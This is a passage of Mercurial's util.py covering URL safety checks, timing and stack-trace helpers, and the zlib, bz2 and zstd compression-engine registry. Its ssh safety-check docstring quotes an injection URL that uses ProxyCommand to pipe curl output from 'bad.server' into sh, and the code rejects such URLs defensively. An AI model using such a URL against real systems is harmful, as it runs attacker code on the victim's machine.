3396 3396 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3397 3397
3398 3398 This is a sanity check for ssh urls. ssh will parse the first item as
3399 3399 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3400 3400 Let's reject these potentially exploitable urls entirely and warn the
3401 3401 user.
3402 3402
3403 3403 Raises an error.Abort when the url is unsafe.
3404 3404 """
3405 3405 path = urlreq.unquote(path)
3406 3406 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3407 3407 raise error.Abort(_('potentially unsafe url: %r') %
3408 3408 (pycompat.bytestr(path),))
3409 3409
3410 3410 def hidepassword(u):
3411 3411 '''hide user credential in a url string'''
3412 3412 u = url(u)
3413 3413 if u.passwd:
3414 3414 u.passwd = '***'
3415 3415 return bytes(u)
3416 3416
3417 3417 def removeauth(u):
3418 3418 '''remove all authentication information from a url string'''
3419 3419 u = url(u)
3420 3420 u.user = u.passwd = None
3421 3421 return str(u)
3422 3422
3423 3423 timecount = unitcountfn(
3424 3424 (1, 1e3, _('%.0f s')),
3425 3425 (100, 1, _('%.1f s')),
3426 3426 (10, 1, _('%.2f s')),
3427 3427 (1, 1, _('%.3f s')),
3428 3428 (100, 0.001, _('%.1f ms')),
3429 3429 (10, 0.001, _('%.2f ms')),
3430 3430 (1, 0.001, _('%.3f ms')),
3431 3431 (100, 0.000001, _('%.1f us')),
3432 3432 (10, 0.000001, _('%.2f us')),
3433 3433 (1, 0.000001, _('%.3f us')),
3434 3434 (100, 0.000000001, _('%.1f ns')),
3435 3435 (10, 0.000000001, _('%.2f ns')),
3436 3436 (1, 0.000000001, _('%.3f ns')),
3437 3437 )
3438 3438
3439 3439 _timenesting = [0]
3440 3440
3441 3441 def timed(func):
3442 3442 '''Report the execution time of a function call to stderr.
3443 3443
3444 3444 During development, use as a decorator when you need to measure
3445 3445 the cost of a function, e.g. as follows:
3446 3446
3447 3447 @util.timed
3448 3448 def foo(a, b, c):
3449 3449 pass
3450 3450 '''
3451 3451
3452 3452 def wrapper(*args, **kwargs):
3453 3453 start = timer()
3454 3454 indent = 2
3455 3455 _timenesting[0] += indent
3456 3456 try:
3457 3457 return func(*args, **kwargs)
3458 3458 finally:
3459 3459 elapsed = timer() - start
3460 3460 _timenesting[0] -= indent
3461 3461 stderr.write('%s%s: %s\n' %
3462 3462 (' ' * _timenesting[0], func.__name__,
3463 3463 timecount(elapsed)))
3464 3464 return wrapper
3465 3465
3466 3466 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3467 3467 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3468 3468
3469 3469 def sizetoint(s):
3470 3470 '''Convert a space specifier to a byte count.
3471 3471
3472 3472 >>> sizetoint(b'30')
3473 3473 30
3474 3474 >>> sizetoint(b'2.2kb')
3475 3475 2252
3476 3476 >>> sizetoint(b'6M')
3477 3477 6291456
3478 3478 '''
3479 3479 t = s.strip().lower()
3480 3480 try:
3481 3481 for k, u in _sizeunits:
3482 3482 if t.endswith(k):
3483 3483 return int(float(t[:-len(k)]) * u)
3484 3484 return int(t)
3485 3485 except ValueError:
3486 3486 raise error.ParseError(_("couldn't parse size: %s") % s)
3487 3487
3488 3488 class hooks(object):
3489 3489 '''A collection of hook functions that can be used to extend a
3490 3490 function's behavior. Hooks are called in lexicographic order,
3491 3491 based on the names of their sources.'''
3492 3492
3493 3493 def __init__(self):
3494 3494 self._hooks = []
3495 3495
3496 3496 def add(self, source, hook):
3497 3497 self._hooks.append((source, hook))
3498 3498
3499 3499 def __call__(self, *args):
3500 3500 self._hooks.sort(key=lambda x: x[0])
3501 3501 results = []
3502 3502 for source, hook in self._hooks:
3503 3503 results.append(hook(*args))
3504 3504 return results
3505 3505
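# Illustrative sketch of the hooks class above (the 'exthooks' name and the
# lambdas are hypothetical, not part of this module):
#
#   exthooks = hooks()
#   exthooks.add('ext-b', lambda x: x + 2)
#   exthooks.add('ext-a', lambda x: x + 1)
#   exthooks(10)   # calls 'ext-a' first, then 'ext-b'; returns [11, 12]
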
3506 3506 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3507 3507 '''Yields lines for a nicely formatted stacktrace.
3508 3508 Skips the 'skip' last entries, then returns the last 'depth' entries.
3509 3509 Each file+linenumber is formatted according to fileline.
3510 3510 Each line is formatted according to line.
3511 3511 If line is None, it yields:
3512 3512 length of longest filepath+line number,
3513 3513 filepath+linenumber,
3514 3514 function
3515 3515
3516 3516 Not to be used in production code, but very convenient while developing.
3517 3517 '''
3518 3518 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3519 3519 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3520 3520 ][-depth:]
3521 3521 if entries:
3522 3522 fnmax = max(len(entry[0]) for entry in entries)
3523 3523 for fnln, func in entries:
3524 3524 if line is None:
3525 3525 yield (fnmax, fnln, func)
3526 3526 else:
3527 3527 yield line % (fnmax, fnln, func)
3528 3528
3529 3529 def debugstacktrace(msg='stacktrace', skip=0,
3530 3530 f=stderr, otherf=stdout, depth=0):
3531 3531 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3532 3532 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3533 3533 By default it will flush stdout first.
3534 3534 It can be used everywhere and intentionally does not require an ui object.
3535 3535 Not to be used in production code, but very convenient while developing.
3536 3536 '''
3537 3537 if otherf:
3538 3538 otherf.flush()
3539 3539 f.write('%s at:\n' % msg.rstrip())
3540 3540 for line in getstackframes(skip + 1, depth=depth):
3541 3541 f.write(line)
3542 3542 f.flush()
3543 3543
3544 3544 class dirs(object):
3545 3545 '''a multiset of directory names from a dirstate or manifest'''
3546 3546
3547 3547 def __init__(self, map, skip=None):
3548 3548 self._dirs = {}
3549 3549 addpath = self.addpath
3550 3550 if safehasattr(map, 'iteritems') and skip is not None:
3551 3551 for f, s in map.iteritems():
3552 3552 if s[0] != skip:
3553 3553 addpath(f)
3554 3554 else:
3555 3555 for f in map:
3556 3556 addpath(f)
3557 3557
3558 3558 def addpath(self, path):
3559 3559 dirs = self._dirs
3560 3560 for base in finddirs(path):
3561 3561 if base in dirs:
3562 3562 dirs[base] += 1
3563 3563 return
3564 3564 dirs[base] = 1
3565 3565
3566 3566 def delpath(self, path):
3567 3567 dirs = self._dirs
3568 3568 for base in finddirs(path):
3569 3569 if dirs[base] > 1:
3570 3570 dirs[base] -= 1
3571 3571 return
3572 3572 del dirs[base]
3573 3573
3574 3574 def __iter__(self):
3575 3575 return iter(self._dirs)
3576 3576
3577 3577 def __contains__(self, d):
3578 3578 return d in self._dirs
3579 3579
3580 3580 if safehasattr(parsers, 'dirs'):
3581 3581 dirs = parsers.dirs
3582 3582
3583 3583 def finddirs(path):
3584 3584 pos = path.rfind('/')
3585 3585 while pos != -1:
3586 3586 yield path[:pos]
3587 3587 pos = path.rfind('/', 0, pos)
3588 3588
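# Illustrative sketch (hypothetical paths): finddirs() yields every ancestor
# directory of a path, deepest first, and the dirs multiset counts how many
# entries live under each of them.
#
#   list(finddirs('a/b/c.txt'))          # -> ['a/b', 'a']
#   d = dirs(['a/b/c.txt', 'a/d.txt'])
#   'a' in d                             # -> True (two entries under 'a')
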
3589 3589 # compression code
3590 3590
3591 3591 SERVERROLE = 'server'
3592 3592 CLIENTROLE = 'client'
3593 3593
3594 3594 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3595 3595 (u'name', u'serverpriority',
3596 3596 u'clientpriority'))
3597 3597
3598 3598 class compressormanager(object):
3599 3599 """Holds registrations of various compression engines.
3600 3600
3601 3601 This class essentially abstracts the differences between compression
3602 3602 engines to allow new compression formats to be added easily, possibly from
3603 3603 extensions.
3604 3604
3605 3605 Compressors are registered against the global instance by calling its
3606 3606 ``register()`` method.
3607 3607 """
3608 3608 def __init__(self):
3609 3609 self._engines = {}
3610 3610 # Bundle spec human name to engine name.
3611 3611 self._bundlenames = {}
3612 3612 # Internal bundle identifier to engine name.
3613 3613 self._bundletypes = {}
3614 3614 # Revlog header to engine name.
3615 3615 self._revlogheaders = {}
3616 3616 # Wire proto identifier to engine name.
3617 3617 self._wiretypes = {}
3618 3618
3619 3619 def __getitem__(self, key):
3620 3620 return self._engines[key]
3621 3621
3622 3622 def __contains__(self, key):
3623 3623 return key in self._engines
3624 3624
3625 3625 def __iter__(self):
3626 3626 return iter(self._engines.keys())
3627 3627
3628 3628 def register(self, engine):
3629 3629 """Register a compression engine with the manager.
3630 3630
3631 3631 The argument must be a ``compressionengine`` instance.
3632 3632 """
3633 3633 if not isinstance(engine, compressionengine):
3634 3634 raise ValueError(_('argument must be a compressionengine'))
3635 3635
3636 3636 name = engine.name()
3637 3637
3638 3638 if name in self._engines:
3639 3639 raise error.Abort(_('compression engine %s already registered') %
3640 3640 name)
3641 3641
3642 3642 bundleinfo = engine.bundletype()
3643 3643 if bundleinfo:
3644 3644 bundlename, bundletype = bundleinfo
3645 3645
3646 3646 if bundlename in self._bundlenames:
3647 3647 raise error.Abort(_('bundle name %s already registered') %
3648 3648 bundlename)
3649 3649 if bundletype in self._bundletypes:
3650 3650 raise error.Abort(_('bundle type %s already registered by %s') %
3651 3651 (bundletype, self._bundletypes[bundletype]))
3652 3652
3653 3653 # No external facing name declared.
3654 3654 if bundlename:
3655 3655 self._bundlenames[bundlename] = name
3656 3656
3657 3657 self._bundletypes[bundletype] = name
3658 3658
3659 3659 wiresupport = engine.wireprotosupport()
3660 3660 if wiresupport:
3661 3661 wiretype = wiresupport.name
3662 3662 if wiretype in self._wiretypes:
3663 3663 raise error.Abort(_('wire protocol compression %s already '
3664 3664 'registered by %s') %
3665 3665 (wiretype, self._wiretypes[wiretype]))
3666 3666
3667 3667 self._wiretypes[wiretype] = name
3668 3668
3669 3669 revlogheader = engine.revlogheader()
3670 3670 if revlogheader and revlogheader in self._revlogheaders:
3671 3671 raise error.Abort(_('revlog header %s already registered by %s') %
3672 3672 (revlogheader, self._revlogheaders[revlogheader]))
3673 3673
3674 3674 if revlogheader:
3675 3675 self._revlogheaders[revlogheader] = name
3676 3676
3677 3677 self._engines[name] = engine
3678 3678
3679 3679 @property
3680 3680 def supportedbundlenames(self):
3681 3681 return set(self._bundlenames.keys())
3682 3682
3683 3683 @property
3684 3684 def supportedbundletypes(self):
3685 3685 return set(self._bundletypes.keys())
3686 3686
3687 3687 def forbundlename(self, bundlename):
3688 3688 """Obtain a compression engine registered to a bundle name.
3689 3689
3690 3690 Will raise KeyError if the bundle type isn't registered.
3691 3691
3692 3692 Will abort if the engine is known but not available.
3693 3693 """
3694 3694 engine = self._engines[self._bundlenames[bundlename]]
3695 3695 if not engine.available():
3696 3696 raise error.Abort(_('compression engine %s could not be loaded') %
3697 3697 engine.name())
3698 3698 return engine
3699 3699
3700 3700 def forbundletype(self, bundletype):
3701 3701 """Obtain a compression engine registered to a bundle type.
3702 3702
3703 3703 Will raise KeyError if the bundle type isn't registered.
3704 3704
3705 3705 Will abort if the engine is known but not available.
3706 3706 """
3707 3707 engine = self._engines[self._bundletypes[bundletype]]
3708 3708 if not engine.available():
3709 3709 raise error.Abort(_('compression engine %s could not be loaded') %
3710 3710 engine.name())
3711 3711 return engine
3712 3712
3713 3713 def supportedwireengines(self, role, onlyavailable=True):
3714 3714 """Obtain compression engines that support the wire protocol.
3715 3715
3716 3716 Returns a list of engines in prioritized order, most desired first.
3717 3717
3718 3718 If ``onlyavailable`` is set, filter out engines that can't be
3719 3719 loaded.
3720 3720 """
3721 3721 assert role in (SERVERROLE, CLIENTROLE)
3722 3722
3723 3723 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3724 3724
3725 3725 engines = [self._engines[e] for e in self._wiretypes.values()]
3726 3726 if onlyavailable:
3727 3727 engines = [e for e in engines if e.available()]
3728 3728
3729 3729 def getkey(e):
3730 3730 # Sort first by priority, highest first. In case of tie, sort
3731 3731 # alphabetically. This is arbitrary, but ensures output is
3732 3732 # stable.
3733 3733 w = e.wireprotosupport()
3734 3734 return -1 * getattr(w, attr), w.name
3735 3735
3736 3736 return list(sorted(engines, key=getkey))
3737 3737
3738 3738 def forwiretype(self, wiretype):
3739 3739 engine = self._engines[self._wiretypes[wiretype]]
3740 3740 if not engine.available():
3741 3741 raise error.Abort(_('compression engine %s could not be loaded') %
3742 3742 engine.name())
3743 3743 return engine
3744 3744
3745 3745 def forrevlogheader(self, header):
3746 3746 """Obtain a compression engine registered to a revlog header.
3747 3747
3748 3748 Will raise KeyError if the revlog header value isn't registered.
3749 3749 """
3750 3750 return self._engines[self._revlogheaders[header]]
3751 3751
3752 3752 compengines = compressormanager()
3753 3753
3754 3754 class compressionengine(object):
3755 3755 """Base class for compression engines.
3756 3756
3757 3757 Compression engines must implement the interface defined by this class.
3758 3758 """
3759 3759 def name(self):
3760 3760 """Returns the name of the compression engine.
3761 3761
3762 3762 This is the key the engine is registered under.
3763 3763
3764 3764 This method must be implemented.
3765 3765 """
3766 3766 raise NotImplementedError()
3767 3767
3768 3768 def available(self):
3769 3769 """Whether the compression engine is available.
3770 3770
3771 3771 The intent of this method is to allow optional compression engines
3772 3772 that may not be available in all installations (such as engines relying
3773 3773 on C extensions that may not be present).
3774 3774 """
3775 3775 return True
3776 3776
3777 3777 def bundletype(self):
3778 3778 """Describes bundle identifiers for this engine.
3779 3779
3780 3780 If this compression engine isn't supported for bundles, returns None.
3781 3781
3782 3782 If this engine can be used for bundles, returns a 2-tuple of strings of
3783 3783 the user-facing "bundle spec" compression name and an internal
3784 3784 identifier used to denote the compression format within bundles. To
3785 3785 exclude the name from external usage, set the first element to ``None``.
3786 3786
3787 3787 If bundle compression is supported, the class must also implement
3788 3788 ``compressstream`` and ``decompressorreader``.
3789 3789
3790 3790 The docstring of this method is used in the help system to tell users
3791 3791 about this engine.
3792 3792 """
3793 3793 return None
3794 3794
3795 3795 def wireprotosupport(self):
3796 3796 """Declare support for this compression format on the wire protocol.
3797 3797
3798 3798 If this compression engine isn't supported for compressing wire
3799 3799 protocol payloads, returns None.
3800 3800
3801 3801 Otherwise, returns ``compenginewireprotosupport`` with the following
3802 3802 fields:
3803 3803
3804 3804 * String format identifier
3805 3805 * Integer priority for the server
3806 3806 * Integer priority for the client
3807 3807
3808 3808 The integer priorities are used to order the advertisement of format
3809 3809 support by server and client. The highest integer is advertised
3810 3810 first. Integers with non-positive values aren't advertised.
3811 3811
3812 3812 The priority values are somewhat arbitrary and only used for default
3813 3813 ordering. The relative order can be changed via config options.
3814 3814
3815 3815 If wire protocol compression is supported, the class must also implement
3816 3816 ``compressstream`` and ``decompressorreader``.
3817 3817 """
3818 3818 return None
3819 3819
3820 3820 def revlogheader(self):
3821 3821 """Header added to revlog chunks that identifies this engine.
3822 3822
3823 3823 If this engine can be used to compress revlogs, this method should
3824 3824 return the bytes used to identify chunks compressed with this engine.
3825 3825 Else, the method should return ``None`` to indicate it does not
3826 3826 participate in revlog compression.
3827 3827 """
3828 3828 return None
3829 3829
3830 3830 def compressstream(self, it, opts=None):
3831 3831 """Compress an iterator of chunks.
3832 3832
3833 3833 The method receives an iterator (ideally a generator) of chunks of
3834 3834 bytes to be compressed. It returns an iterator (ideally a generator)
3835 3835 of bytes of chunks representing the compressed output.
3836 3836
3837 3837 Optionally accepts an argument defining how to perform compression.
3838 3838 Each engine treats this argument differently.
3839 3839 """
3840 3840 raise NotImplementedError()
3841 3841
3842 3842 def decompressorreader(self, fh):
3843 3843 """Perform decompression on a file object.
3844 3844
3845 3845 Argument is an object with a ``read(size)`` method that returns
3846 3846 compressed data. Return value is an object with a ``read(size)`` that
3847 3847 returns uncompressed data.
3848 3848 """
3849 3849 raise NotImplementedError()
3850 3850
3851 3851 def revlogcompressor(self, opts=None):
3852 3852 """Obtain an object that can be used to compress revlog entries.
3853 3853
3854 3854 The object has a ``compress(data)`` method that compresses binary
3855 3855 data. This method returns compressed binary data or ``None`` if
3856 3856 the data could not be compressed (too small, not compressible, etc).
3857 3857 The returned data should have a header uniquely identifying this
3858 3858 compression format so decompression can be routed to this engine.
3859 3859 This header should be identified by the ``revlogheader()`` return
3860 3860 value.
3861 3861
3862 3862 The object has a ``decompress(data)`` method that decompresses
3863 3863 data. The method will only be called if ``data`` begins with
3864 3864 ``revlogheader()``. The method should return the raw, uncompressed
3865 3865 data or raise a ``RevlogError``.
3866 3866
3867 3867 The object is reusable but is not thread safe.
3868 3868 """
3869 3869 raise NotImplementedError()
3870 3870
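# Hypothetical sketch of how an extension could plug an extra algorithm into
# the registry above; the engine name and priorities are invented, and the
# streaming logic simply reuses stdlib zlib so the sketch stays
# self-contained.
#
#   class _deflateexampleengine(compressionengine):
#       def name(self):
#           return 'deflate-example'
#       def wireprotosupport(self):
#           # low priorities so the real engines win during negotiation
#           return compewireprotosupport('deflate-example', 5, 5)
#       def compressstream(self, it, opts=None):
#           z = zlib.compressobj()
#           for chunk in it:
#               data = z.compress(chunk)
#               if data:
#                   yield data
#           yield z.flush()
#       def decompressorreader(self, fh):
#           def gen():
#               d = zlib.decompressobj()
#               for chunk in filechunkiter(fh):
#                   yield d.decompress(chunk)
#           return chunkbuffer(gen())
#
#   compengines.register(_deflateexampleengine())
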
3871 3871 class _zlibengine(compressionengine):
3872 3872 def name(self):
3873 3873 return 'zlib'
3874 3874
3875 3875 def bundletype(self):
3876 3876 """zlib compression using the DEFLATE algorithm.
3877 3877
3878 3878 All Mercurial clients should support this format. The compression
3879 3879 algorithm strikes a reasonable balance between compression ratio
3880 3880 and size.
3881 3881 """
3882 3882 return 'gzip', 'GZ'
3883 3883
3884 3884 def wireprotosupport(self):
3885 3885 return compewireprotosupport('zlib', 20, 20)
3886 3886
3887 3887 def revlogheader(self):
3888 3888 return 'x'
3889 3889
3890 3890 def compressstream(self, it, opts=None):
3891 3891 opts = opts or {}
3892 3892
3893 3893 z = zlib.compressobj(opts.get('level', -1))
3894 3894 for chunk in it:
3895 3895 data = z.compress(chunk)
3896 3896 # Not all calls to compress emit data. It is cheaper to inspect
3897 3897 # here than to feed empty chunks through the generator.
3898 3898 if data:
3899 3899 yield data
3900 3900
3901 3901 yield z.flush()
3902 3902
3903 3903 def decompressorreader(self, fh):
3904 3904 def gen():
3905 3905 d = zlib.decompressobj()
3906 3906 for chunk in filechunkiter(fh):
3907 3907 while chunk:
3908 3908 # Limit output size to limit memory.
3909 3909 yield d.decompress(chunk, 2 ** 18)
3910 3910 chunk = d.unconsumed_tail
3911 3911
3912 3912 return chunkbuffer(gen())
3913 3913
3914 3914 class zlibrevlogcompressor(object):
3915 3915 def compress(self, data):
3916 3916 insize = len(data)
3917 3917 # Caller handles empty input case.
3918 3918 assert insize > 0
3919 3919
3920 3920 if insize < 44:
3921 3921 return None
3922 3922
3923 3923 elif insize <= 1000000:
3924 3924 compressed = zlib.compress(data)
3925 3925 if len(compressed) < insize:
3926 3926 return compressed
3927 3927 return None
3928 3928
3929 3929 # zlib makes an internal copy of the input buffer, doubling
3930 3930 # memory usage for large inputs. So do streaming compression
3931 3931 # on large inputs.
3932 3932 else:
3933 3933 z = zlib.compressobj()
3934 3934 parts = []
3935 3935 pos = 0
3936 3936 while pos < insize:
3937 3937 pos2 = pos + 2**20
3938 3938 parts.append(z.compress(data[pos:pos2]))
3939 3939 pos = pos2
3940 3940 parts.append(z.flush())
3941 3941
3942 3942 if sum(map(len, parts)) < insize:
3943 3943 return ''.join(parts)
3944 3944 return None
3945 3945
3946 3946 def decompress(self, data):
3947 3947 try:
3948 3948 return zlib.decompress(data)
3949 3949 except zlib.error as e:
3950 3950 raise error.RevlogError(_('revlog decompress error: %s') %
3951 3951 forcebytestr(e))
3952 3952
3953 3953 def revlogcompressor(self, opts=None):
3954 3954 return self.zlibrevlogcompressor()
3955 3955
3956 3956 compengines.register(_zlibengine())
3957 3957
3958 3958 class _bz2engine(compressionengine):
3959 3959 def name(self):
3960 3960 return 'bz2'
3961 3961
3962 3962 def bundletype(self):
3963 3963 """An algorithm that produces smaller bundles than ``gzip``.
3964 3964
3965 3965 All Mercurial clients should support this format.
3966 3966
3967 3967 This engine will likely produce smaller bundles than ``gzip`` but
3968 3968 will be significantly slower, both during compression and
3969 3969 decompression.
3970 3970
3971 3971 If available, the ``zstd`` engine can yield similar or better
3972 3972 compression at much higher speeds.
3973 3973 """
3974 3974 return 'bzip2', 'BZ'
3975 3975
3976 3976 # We declare a protocol name but don't advertise by default because
3977 3977 # it is slow.
3978 3978 def wireprotosupport(self):
3979 3979 return compewireprotosupport('bzip2', 0, 0)
3980 3980
3981 3981 def compressstream(self, it, opts=None):
3982 3982 opts = opts or {}
3983 3983 z = bz2.BZ2Compressor(opts.get('level', 9))
3984 3984 for chunk in it:
3985 3985 data = z.compress(chunk)
3986 3986 if data:
3987 3987 yield data
3988 3988
3989 3989 yield z.flush()
3990 3990
3991 3991 def decompressorreader(self, fh):
3992 3992 def gen():
3993 3993 d = bz2.BZ2Decompressor()
3994 3994 for chunk in filechunkiter(fh):
3995 3995 yield d.decompress(chunk)
3996 3996
3997 3997 return chunkbuffer(gen())
3998 3998
3999 3999 compengines.register(_bz2engine())
4000 4000
4001 4001 class _truncatedbz2engine(compressionengine):
4002 4002 def name(self):
4003 4003 return 'bz2truncated'
4004 4004
4005 4005 def bundletype(self):
4006 4006 return None, '_truncatedBZ'
4007 4007
4008 4008 # We don't implement compressstream because it is hackily handled elsewhere.
4009 4009
4010 4010 def decompressorreader(self, fh):
4011 4011 def gen():
4012 4012 # The input stream doesn't have the 'BZ' header. So add it back.
4013 4013 d = bz2.BZ2Decompressor()
4014 4014 d.decompress('BZ')
4015 4015 for chunk in filechunkiter(fh):
4016 4016 yield d.decompress(chunk)
4017 4017
4018 4018 return chunkbuffer(gen())
4019 4019
4020 4020 compengines.register(_truncatedbz2engine())
4021 4021
4022 4022 class _noopengine(compressionengine):
4023 4023 def name(self):
4024 4024 return 'none'
4025 4025
4026 4026 def bundletype(self):
4027 4027 """No compression is performed.
4028 4028
4029 4029 Use this compression engine to explicitly disable compression.
4030 4030 """
4031 4031 return 'none', 'UN'
4032 4032
4033 4033 # Clients always support uncompressed payloads. Servers don't by default
4034 4034 # because, unless you are on a fast network, uncompressed payloads can
4035 4035 # easily saturate your network pipe.
4036 4036 def wireprotosupport(self):
4037 4037 return compewireprotosupport('none', 0, 10)
4038 4038
4039 4039 # We don't implement revlogheader because it is handled specially
4040 4040 # in the revlog class.
4041 4041
4042 4042 def compressstream(self, it, opts=None):
4043 4043 return it
4044 4044
4045 4045 def decompressorreader(self, fh):
4046 4046 return fh
4047 4047
4048 4048 class nooprevlogcompressor(object):
4049 4049 def compress(self, data):
4050 4050 return None
4051 4051
4052 4052 def revlogcompressor(self, opts=None):
4053 4053 return self.nooprevlogcompressor()
4054 4054
4055 4055 compengines.register(_noopengine())
4056 4056
4057 4057 class _zstdengine(compressionengine):
4058 4058 def name(self):
4059 4059 return 'zstd'
4060 4060
4061 4061 @propertycache
4062 4062 def _module(self):
4063 4063 # Not all installs have the zstd module available. So defer importing
4064 4064 # until first access.
4065 4065 try:
4066 4066 from . import zstd
4067 4067 # Force delayed import.
4068 4068 zstd.__version__
4069 4069 return zstd
4070 4070 except ImportError:
4071 4071 return None
4072 4072
4073 4073 def available(self):
4074 4074 return bool(self._module)
4075 4075
4076 4076 def bundletype(self):
4077 4077 """A modern compression algorithm that is fast and highly flexible.
4078 4078
4079 4079 Only supported by Mercurial 4.1 and newer clients.
4080 4080
4081 4081 With the default settings, zstd compression is both faster and yields
4082 4082 better compression than ``gzip``. It also frequently yields better
4083 4083 compression than ``bzip2`` while operating at much higher speeds.
4084 4084
4085 4085 If this engine is available and backwards compatibility is not a
4086 4086 concern, it is likely the best available engine.
4087 4087 """
4088 4088 return 'zstd', 'ZS'
4089 4089
4090 4090 def wireprotosupport(self):
4091 4091 return compewireprotosupport('zstd', 50, 50)
4092 4092
4093 4093 def revlogheader(self):
4094 4094 return '\x28'
4095 4095
4096 4096 def compressstream(self, it, opts=None):
4097 4097 opts = opts or {}
4098 4098 # zstd level 3 is almost always significantly faster than zlib
4099 4099 # while providing no worse compression. It strikes a good balance
4100 4100 # between speed and compression.
4101 4101 level = opts.get('level', 3)
4102 4102
4103 4103 zstd = self._module
4104 4104 z = zstd.ZstdCompressor(level=level).compressobj()
4105 4105 for chunk in it:
4106 4106 data = z.compress(chunk)
4107 4107 if data:
4108 4108 yield data
4109 4109
4110 4110 yield z.flush()
4111 4111
4112 4112 def decompressorreader(self, fh):
4113 4113 zstd = self._module
4114 4114 dctx = zstd.ZstdDecompressor()
4115 4115 return chunkbuffer(dctx.read_from(fh))
4116 4116
4117 4117 class zstdrevlogcompressor(object):
4118 4118 def __init__(self, zstd, level=3):
4119 4119 # Writing the content size adds a few bytes to the output. However,
4120 4120 # it allows decompression to be more optimal since we can
4121 4121 # pre-allocate a buffer to hold the result.
4122 4122 self._cctx = zstd.ZstdCompressor(level=level,
4123 4123 write_content_size=True)
4124 4124 self._dctx = zstd.ZstdDecompressor()
4125 4125 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
4126 4126 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
4127 4127
4128 4128 def compress(self, data):
4129 4129 insize = len(data)
4130 4130 # Caller handles empty input case.
4131 4131 assert insize > 0
4132 4132
4133 4133 if insize < 50:
4134 4134 return None
4135 4135
4136 4136 elif insize <= 1000000:
4137 4137 compressed = self._cctx.compress(data)
4138 4138 if len(compressed) < insize:
4139 4139 return compressed
4140 4140 return None
4141 4141 else:
4142 4142 z = self._cctx.compressobj()
4143 4143 chunks = []
4144 4144 pos = 0
4145 4145 while pos < insize:
4146 4146 pos2 = pos + self._compinsize
4147 4147 chunk = z.compress(data[pos:pos2])
4148 4148 if chunk:
4149 4149 chunks.append(chunk)
4150 4150 pos = pos2
4151 4151 chunks.append(z.flush())
4152 4152
4153 4153 if sum(map(len, chunks)) < insize:
4154 4154 return ''.join(chunks)
4155 4155 return None
4156 4156
4157 4157 def decompress(self, data):
4158 4158 insize = len(data)
4159 4159
4160 4160 try:
4161 4161 # This was measured to be faster than other streaming
4162 4162 # decompressors.
4163 4163 dobj = self._dctx.decompressobj()
4164 4164 chunks = []
4165 4165 pos = 0
4166 4166 while pos < insize:
4167 4167 pos2 = pos + self._decompinsize
4168 4168 chunk = dobj.decompress(data[pos:pos2])
4169 4169 if chunk:
4170 4170 chunks.append(chunk)
4171 4171 pos = pos2
4172 4172 # Frame should be exhausted, so no finish() API.
4173 4173
4174 4174 return ''.join(chunks)
4175 4175 except Exception as e:
4176 4176 raise error.RevlogError(_('revlog decompress error: %s') %
4177 4177 forcebytestr(e))
4178 4178
4179 4179 def revlogcompressor(self, opts=None):
4180 4180 opts = opts or {}
4181 4181 return self.zstdrevlogcompressor(self._module,
4182 4182 level=opts.get('level', 3))
4183 4183
4184 4184 compengines.register(_zstdengine())
4185 4185
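# Illustrative use of the populated registry (local names below are
# hypothetical): look an engine up by its bundle-spec name and run data
# through its streaming compressor and decompressor.
#
#   engine = compengines.forbundlename('gzip')
#   blob = ''.join(engine.compressstream(['some data'] * 100))
#   reader = engine.decompressorreader(stringio(blob))
#   reader.read(9)   # -> 'some data'
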
4186 4186 def bundlecompressiontopics():
4187 4187 """Obtains a list of available bundle compressions for use in help."""
4188 4188 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
4189 4189 items = {}
4190 4190
4191 4191 # We need to format the docstring. So use a dummy object/type to hold it
4192 4192 # rather than mutating the original.
4193 4193 class docobject(object):
4194 4194 pass
4195 4195
4196 4196 for name in compengines:
4197 4197 engine = compengines[name]
4198 4198
4199 4199 if not engine.available():
4200 4200 continue
4201 4201
4202 4202 bt = engine.bundletype()
4203 4203 if not bt or not bt[0]:
4204 4204 continue
4205 4205
4206 4206 doc = pycompat.sysstr('``%s``\n %s') % (
4207 4207 bt[0], engine.bundletype.__doc__)
4208 4208
4209 4209 value = docobject()
4210 4210 value.__doc__ = doc
4211 4211 value._origdoc = engine.bundletype.__doc__
4212 4212 value._origfunc = engine.bundletype
4213 4213
4214 4214 items[bt[0]] = value
4215 4215
4216 4216 return items
4217 4217
4218 4218 i18nfunctions = bundlecompressiontopics().values()
4219 4219
4220 4220 # convenient shortcut
4221 4221 dst = debugstacktrace
4222 4222
4223 4223 def safename(f, tag, ctx, others=None):
4224 4224 """
4225 4225 Generate a name that it is safe to rename f to in the given context.
4226 4226
4227 4227 f: filename to rename
4228 4228 tag: a string tag that will be included in the new name
4229 4229 ctx: a context, in which the new name must not exist
4230 4230 others: a set of other filenames that the new name must not be in
4231 4231
4232 4232 Returns a file name of the form oldname~tag[~number] which does not exist
4233 4233 in the provided context and is not in the set of other names.
4234 4234 """
4235 4235 if others is None:
4236 4236 others = set()
4237 4237
4238 4238 fn = '%s~%s' % (f, tag)
4239 4239 if fn not in ctx and fn not in others:
4240 4240 return fn
4241 4241 for n in itertools.count(1):
4242 4242 fn = '%s~%s~%s' % (f, tag, n)
4243 4243 if fn not in ctx and fn not in others:
4244 4244 return fn
4245 4245
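# For illustration (hypothetical values): with tag 'orig' and a context that
# already contains 'foo~orig', safename('foo', 'orig', ctx) returns
# 'foo~orig~1'; with no collision it simply returns 'foo~orig'.
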
4246 4246 def readexactly(stream, n):
4247 4247 '''read n bytes from stream.read and abort if less was available'''
4248 4248 s = stream.read(n)
4249 4249 if len(s) < n:
4250 4250 raise error.Abort(_("stream ended unexpectedly"
4251 4251 " (got %d bytes, expected %d)")
4252 4252 % (len(s), n))
4253 4253 return s
4254 4254
4255 4255 def uvarintencode(value):
4256 4256 """Encode an unsigned integer value to a varint.
4257 4257
4258 4258 A varint is a variable length integer of 1 or more bytes. Each byte
